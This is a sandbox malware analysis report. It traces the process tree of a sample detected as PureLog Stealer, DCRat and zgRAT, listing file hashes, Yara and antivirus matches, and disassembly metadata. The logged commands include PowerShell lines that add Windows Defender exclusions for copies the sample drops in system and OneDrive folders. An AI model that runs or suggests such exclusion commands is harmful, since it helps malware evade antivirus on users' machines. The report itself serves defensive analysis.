                                                                    Start time:21:36:55
                                                                    Start date:05/11/2024
                                                                    Path:C:\Users\user\Desktop\EQdhBjQw4G.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Users\user\Desktop\EQdhBjQw4G.exe"
                                                                    Imagebase:0xdf0000
                                                                    File size:1'719'296 bytes
                                                                    MD5 hash:477DB3DE46B7779B63495A8BDB279F2C
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000000.1639490533.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000002.1721488427.0000000013331000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:1
                                                                    Start time:21:36:58
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5czz1opi\5czz1opi.cmdline"
                                                                    Imagebase:0x7ff701200000
                                                                    File size:2'759'232 bytes
                                                                    MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:moderate
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:2
                                                                    Start time:21:36:58
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff7699e0000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:3
                                                                    Start time:21:36:58
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES790E.tmp" "c:\Windows\System32\CSCF98670F718C4420FABE8D0275D85BFD.TMP"
                                                                    Imagebase:0x7ff682250000
                                                                    File size:52'744 bytes
                                                                    MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:moderate
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:4
                                                                    Start time:21:36:58
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe'
                                                                    Imagebase:0x7ff788560000
                                                                    File size:452'608 bytes
                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:5
                                                                    Start time:21:36:58
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\SysWOW64\en-GB\Licenses\_Default\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe'
                                                                    Imagebase:0x7ff788560000
                                                                    File size:452'608 bytes
                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:6
                                                                    Start time:21:36:58
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff7699e0000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:false

                                                                    General

                                                                    Target ID:7
                                                                    Start time:21:36:58
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\RuntimeBroker.exe'
                                                                    Imagebase:0x7ff788560000
                                                                    File size:452'608 bytes
                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:8
                                                                    Start time:21:36:58
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff7699e0000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:false

                                                                    General

                                                                    Target ID:9
                                                                    Start time:21:36:58
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\Start Menu\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe'
                                                                    Imagebase:0x7ff788560000
                                                                    File size:452'608 bytes
                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:10
                                                                    Start time:21:36:58
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff7699e0000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:false

                                                                    General

                                                                    Target ID:11
                                                                    Start time:21:36:58
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe'
                                                                    Imagebase:0x7ff788560000
                                                                    File size:452'608 bytes
                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:12
                                                                    Start time:21:36:58
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff7699e0000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:false

                                                                    General

                                                                    Target ID:13
                                                                    Start time:21:36:58
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\EQdhBjQw4G.exe'
                                                                    Imagebase:0x7ff788560000
                                                                    File size:452'608 bytes
                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:14
                                                                    Start time:21:36:58
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff7699e0000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:false

                                                                    General

                                                                    Target ID:15
                                                                    Start time:21:36:58
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff7699e0000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:false

                                                                    General

                                                                    Target ID:16
                                                                    Start time:21:36:59
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\cmd.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\nQeR8AonhE.bat"
                                                                    Imagebase:0x7ff707720000
                                                                    File size:289'792 bytes
                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:17
                                                                    Start time:21:36:59
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff7699e0000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:18
                                                                    Start time:21:36:59
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\chcp.com
                                                                    Wow64 process (32bit):false
                                                                    Commandline:chcp 65001
                                                                    Imagebase:0x7ff7db430000
                                                                    File size:14'848 bytes
                                                                    MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:19
                                                                    Start time:21:37:01
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\PING.EXE
                                                                    Wow64 process (32bit):false
                                                                    Commandline:ping -n 10 localhost
                                                                    Imagebase:0x7ff77fea0000
                                                                    File size:22'528 bytes
                                                                    MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:20
                                                                    Start time:21:37:06
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                    Imagebase:0x7ff693ab0000
                                                                    File size:496'640 bytes
                                                                    MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:21
                                                                    Start time:21:37:10
                                                                    Start date:05/11/2024
                                                                    Path:C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe"
                                                                    Imagebase:0x7c0000
                                                                    File size:1'719'296 bytes
                                                                    MD5 hash:477DB3DE46B7779B63495A8BDB279F2C
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe, Author: Joe Security
                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe, Author: Joe Security
                                                                    Antivirus matches:
                                                                    • Detection: 100%, Avira
                                                                    • Detection: 100%, Avira
                                                                    • Detection: 100%, Avira
                                                                    • Detection: 100%, Joe Sandbox ML
                                                                    • Detection: 100%, Joe Sandbox ML
                                                                    • Detection: 100%, Joe Sandbox ML
                                                                    • Detection: 66%, ReversingLabs
                                                                    • Detection: 53%, Virustotal, Browse
                                                                    Has exited:false

                                                                    General

                                                                    Target ID:22
                                                                    Start time:21:37:10
                                                                    Start date:05/11/2024
                                                                    Path:C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\RuntimeBroker.exe"
                                                                    Imagebase:0xe50000
                                                                    File size:1'719'296 bytes
                                                                    MD5 hash:477DB3DE46B7779B63495A8BDB279F2C
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exe, Author: Joe Security
                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exe, Author: Joe Security
                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exe, Author: Joe Security
                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exe, Author: Joe Security
                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exe, Author: Joe Security
                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exe, Author: Joe Security
                                                                    Antivirus matches:
                                                                    • Detection: 100%, Avira
                                                                    • Detection: 100%, Joe Sandbox ML
                                                                    • Detection: 66%, ReversingLabs
                                                                    • Detection: 53%, Virustotal, Browse
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:24
                                                                    Start time:21:37:15
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\svchost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                    Imagebase:0x7ff6eef20000
                                                                    File size:55'320 bytes
                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:false

                                                                    General

                                                                    Target ID:25
                                                                    Start time:21:37:18
                                                                    Start date:05/11/2024
                                                                    Path:C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\RuntimeBroker.exe"
                                                                    Imagebase:0xda0000
                                                                    File size:1'719'296 bytes
                                                                    MD5 hash:477DB3DE46B7779B63495A8BDB279F2C
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:28
                                                                    Start time:21:37:27
                                                                    Start date:05/11/2024
                                                                    Path:C:\Users\user\Desktop\EQdhBjQw4G.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Users\user\Desktop\EQdhBjQw4G.exe"
                                                                    Imagebase:0x140000
                                                                    File size:1'719'296 bytes
                                                                    MD5 hash:477DB3DE46B7779B63495A8BDB279F2C
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:29
                                                                    Start time:21:37:35
                                                                    Start date:05/11/2024
                                                                    Path:C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe"
                                                                    Imagebase:0x5e0000
                                                                    File size:1'719'296 bytes
                                                                    MD5 hash:477DB3DE46B7779B63495A8BDB279F2C
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:30
                                                                    Start time:21:37:44
                                                                    Start date:05/11/2024
                                                                    Path:C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\RuntimeBroker.exe"
                                                                    Imagebase:0xc80000
                                                                    File size:1'719'296 bytes
                                                                    MD5 hash:477DB3DE46B7779B63495A8BDB279F2C
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:31
                                                                    Start time:21:37:53
                                                                    Start date:05/11/2024
                                                                    Path:C:\Users\user\Desktop\EQdhBjQw4G.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Users\user\Desktop\EQdhBjQw4G.exe"
                                                                    Imagebase:0x480000
                                                                    File size:1'719'296 bytes
                                                                    MD5 hash:477DB3DE46B7779B63495A8BDB279F2C
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:32
                                                                    Start time:21:38:02
                                                                    Start date:05/11/2024
                                                                    Path:C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe"
                                                                    Imagebase:0xfe0000
                                                                    File size:1'719'296 bytes
                                                                    MD5 hash:477DB3DE46B7779B63495A8BDB279F2C
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:33
                                                                    Start time:21:38:10
                                                                    Start date:05/11/2024
                                                                    Path:C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\RuntimeBroker.exe"
                                                                    Imagebase:0x470000
                                                                    File size:1'719'296 bytes
                                                                    MD5 hash:477DB3DE46B7779B63495A8BDB279F2C
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:34
                                                                    Start time:21:38:19
                                                                    Start date:05/11/2024
                                                                    Path:C:\Users\user\Desktop\EQdhBjQw4G.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Users\user\Desktop\EQdhBjQw4G.exe"
                                                                    Imagebase:0x8e0000
                                                                    File size:1'719'296 bytes
                                                                    MD5 hash:477DB3DE46B7779B63495A8BDB279F2C
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:36
                                                                    Start time:21:38:27
                                                                    Start date:05/11/2024
                                                                    Path:C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe"
                                                                    Imagebase:0x50000
                                                                    File size:1'719'296 bytes
                                                                    MD5 hash:477DB3DE46B7779B63495A8BDB279F2C
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:37
                                                                    Start time:21:38:35
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\SysWOW64\en-GB\Licenses\_Default\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Windows\SysWOW64\en-GB\Licenses\_Default\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe"
                                                                    Imagebase:0xf60000
                                                                    File size:1'719'296 bytes
                                                                    MD5 hash:477DB3DE46B7779B63495A8BDB279F2C
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Antivirus matches:
                                                                    • Detection: 66%, ReversingLabs
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:38
                                                                    Start time:21:38:44
                                                                    Start date:05/11/2024
                                                                    Path:C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\RuntimeBroker.exe"
                                                                    Imagebase:0xe30000
                                                                    File size:1'719'296 bytes
                                                                    MD5 hash:477DB3DE46B7779B63495A8BDB279F2C
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:39
                                                                    Start time:21:38:52
                                                                    Start date:05/11/2024
                                                                    Path:C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Users\Default User\Start Menu\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe"
                                                                    Imagebase:0xf40000
                                                                    File size:1'719'296 bytes
                                                                    MD5 hash:477DB3DE46B7779B63495A8BDB279F2C
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Antivirus matches:
                                                                    • Detection: 66%, ReversingLabs
                                                                    • Detection: 53%, Virustotal, Browse
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:40
                                                                    Start time:21:39:00
                                                                    Start date:05/11/2024
                                                                    Path:C:\Users\user\Desktop\EQdhBjQw4G.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Users\user\Desktop\EQdhBjQw4G.exe"
                                                                    Imagebase:0xed0000
                                                                    File size:1'719'296 bytes
                                                                    MD5 hash:477DB3DE46B7779B63495A8BDB279F2C
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:false

                                                                    Disassembly

                                                                    Reset < >

                                                                      Execution Graph

                                                                      Execution Coverage:6.8%
                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                      Signature Coverage:0%
                                                                      Total number of Nodes:3
                                                                      Total number of Limit Nodes:0
                                                                      execution_graph 7757 7ffd9bc356c1 7760 7ffd9bc356df QueryFullProcessImageNameA 7757->7760 7759 7ffd9bc35884 7760->7759

                                                                      Executed Functions

                                                                      Function 00007FFD9BC356C1 Relevance: 1.8, APIs: 1, Instructions: 255COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1765259253.00007FFD9BC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC30000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc30000_EQdhBjQw4G.jbxd
                                                                      Similarity
                                                                      • API ID: FullImageNameProcessQuery
                                                                      • String ID:
                                                                      • API String ID: 3578328331-0
                                                                      • Opcode ID: 4533afd452fd364b2e2a201170aa962b37c242944f4a261b56a631b46505db41
                                                                      • Instruction ID: a53af62f7de3f0b5d72bde2467268b76fe19a5d0f85aaae8d379ab0a05750866
                                                                      • Opcode Fuzzy Hash: 4533afd452fd364b2e2a201170aa962b37c242944f4a261b56a631b46505db41
                                                                      • Instruction Fuzzy Hash: 4C71AF30618A8D8FDB68DF28C8557F937E1FB59311F04426EE84EC7292CB74A9458B81
                                                                      Function 00007FFD9B890D78 Relevance: .2, Instructions: 188COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1760043818.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffd9b890000_EQdhBjQw4G.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 861e68c435d16d74e92a7b8fcc1b46401024db9a765b1e58e76b6fea0bfe6109
                                                                      • Instruction ID: b5a8a9ead3c0d059c2e41e75b7e8982bd1002e64da04403997879f17b90f8817
                                                                      • Opcode Fuzzy Hash: 861e68c435d16d74e92a7b8fcc1b46401024db9a765b1e58e76b6fea0bfe6109
                                                                      • Instruction Fuzzy Hash: 0C51D661B19A8D4FDB99DF6888657A8BFE1FFA9300F4400BAE059C72D7DF7818018741
                                                                      Function 00007FFD9B8908E8 Relevance: .1, Instructions: 133COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1760043818.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffd9b890000_EQdhBjQw4G.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c6f3dcce408037af0bfcc1fd562898c8b4b01e48d0de5430fc747db31bd9259e
                                                                      • Instruction ID: 2dbd788af1dd3aa85cb5b020e09f3194dbd01ede1029f73cd545fa5935407d9d
                                                                      • Opcode Fuzzy Hash: c6f3dcce408037af0bfcc1fd562898c8b4b01e48d0de5430fc747db31bd9259e
                                                                      • Instruction Fuzzy Hash: 2731043130D9194FDB68EB5CE88A9B97BD1EF8932131541BBE48AC7176D911EC828781
                                                                      Function 00007FFD9B890998 Relevance: .1, Instructions: 98COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1760043818.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffd9b890000_EQdhBjQw4G.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ba4bfd2192b9736e1643be7a2a8dc6dd3d44d1424358a5e7128d757f556895cb
                                                                      • Instruction ID: 7fa1b8372fa5866573abd38420bc90e7f595873b4fbdd581c87601377913724f
                                                                      • Opcode Fuzzy Hash: ba4bfd2192b9736e1643be7a2a8dc6dd3d44d1424358a5e7128d757f556895cb
                                                                      • Instruction Fuzzy Hash: 37214820B1DD1D0FEB58B76C946A679B6C6EBDC321F4100BDE80EC32E7DD28AC414281
                                                                      Function 00007FFD9B89119D Relevance: .1, Instructions: 94COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1760043818.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffd9b890000_EQdhBjQw4G.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
